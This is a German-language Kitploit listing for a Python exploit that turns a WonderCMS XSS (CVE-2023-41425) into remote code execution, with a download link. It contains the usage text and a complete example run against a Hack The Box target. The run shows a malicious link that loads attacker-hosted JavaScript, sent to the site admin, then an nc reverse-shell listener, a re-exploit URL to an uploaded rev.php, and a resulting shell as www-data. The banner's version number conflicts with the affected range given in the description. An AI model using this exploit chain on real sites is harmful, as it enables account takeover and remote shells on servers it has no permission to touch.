Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-41425 — Python-Exploit für Wonder CMS XSS-zu-RCE (CVE-2023-41425), der bösartige Skripte lokal bereitstellt und Remote-Codeausführung ohne externe Abhängigkeiten ermöglicht. | Kitploit
Tools/GitHubGitHub/duck-sec/cve-2023-41425
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubduck-sec/cve-2023-41425

CVE-2023-41425

Python-Exploit für Wonder CMS XSS-zu-RCE (CVE-2023-41425), der bösartige Skripte lokal bereitstellt und Remote-Codeausführung ohne externe Abhängigkeiten ermöglicht.

Repository anzeigen
346vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-41425

Beschreibung

Eine Cross-Site-Scripting-Schwachstelle in WonderCMS Version 3.2.0 bis Version 3.4.2 ermöglicht es einem entfernten Angreifer, willkürlichen Code über ein manipuliertes Skript auszuführen, das auf die installModule-Komponente hochgeladen wird. Dies ist eine modifizierte Version des ursprünglichen Exploits von prodigiousMind, die den Exploit dahingehend erweitert, dass er vollständig lokal ausgeführt wird, ohne Abhängigkeit von einer externen Internetverbindung.

Nützlich, wenn man auf hoher See ist und ein Problem mit dem Fahrrad hat ...

Hinweis: xss.js wurde zu Demonstrationszwecken im Repository belassen; das Skript überschreibt diese Datei beim Ausführen mit Ihrer Konfiguration.

Usage

root@kitploit:~
usage: exploit.py [-h] -u URL -lh LHOST -lp LPORT -sh SRVHOST -sp SRVPORT

WonderCMS 4.3.2 XSS to RCE Exploit

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     The login URL of the WonderCMS site (e.g., http://localhost/wondercms/loginURL)
  -lh LHOST, --lhost LHOST
                        The IP address for the reverse shell listener
  -lp LPORT, --lport LPORT
                        The port for the reverse shell listener
  -sh SRVHOST, --srvhost SRVHOST
                        The local IP serving the malicious XSS JavaScript
  -sp SRVPORT, --srvport SRVPORT
                        The local port serving the malicious XSS JavaScript

Example

Hinweis: Dieser Exploit kann recht langsam arbeiten!

root@kitploit:~
$python3 exploit.py -u http://sea.htb/loginURL  -lh 10.10.14.101 -lp  7777  -sh 10.10.14.101 -sp 8888
##################################
# Wondercms 4.3.2 XSS to RCE     #
# Original POC by prodigiousMind #
# Updated version by Ducksec     #
##################################


Check you got this stuff right!


Parsed arguments:
URL: http://sea.htb/loginURL
LHOST: 10.10.14.101
LPORT: 7777
SRVHOST: 10.10.14.101
SRVPORT: 8888


[+] xss.js is created
[+] Execute the below command in another terminal:

----------------------------
nc -lvp 7777
----------------------------

Send the below link to admin:

----------------------------
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.101:8888/xss.js"></script><form+action="
----------------------------



[+] Ensure that main.zip is still in this directory.
[+] Once the target successfully requests main.zip it's safe to kill this script.


[+] Once complete, you can also re-exploit by requesting: http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.101&lport=7777

Starting HTTP server to allow access to xss.js
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.129.178.129 - - [02/Oct/2024 14:39:51] "GET /xss.js HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
root@kitploit:~
$nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.14.101] from (UNKNOWN) [10.129.178.129] 39958
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 13:40:01 up 4 min,  0 users,  load average: 0.93, 0.49, 0.20
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Referenzen

  1. https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
  2. https://github.com/WonderCMS/wondercms/releases/tag/3.4.3

Haftungsausschluss

Dieser Code dient ausschließlich zu Bildungszwecken und für ethische Sicherheitstests. Er sollte nur verantwortungsvoll und in Umgebungen eingesetzt werden, in denen eine ausdrückliche Genehmigung erteilt wurde. Nicht autorisierte oder böswillige Nutzung ist strengstens untersagt. Durch die Nutzung dieses Codes erklären Sie sich damit einverstanden, alle geltenden Gesetze, Vorschriften und ethischen Standards in Ihrer Zuständigkeit einzuhalten. Die Ersteller und Mitwirkenden lehnen jegliche Haftung für Schäden oder Folgen ab, die durch Missbrauch oder unbefugte Nutzung dieses Codes entstehen.

Tool herunterladen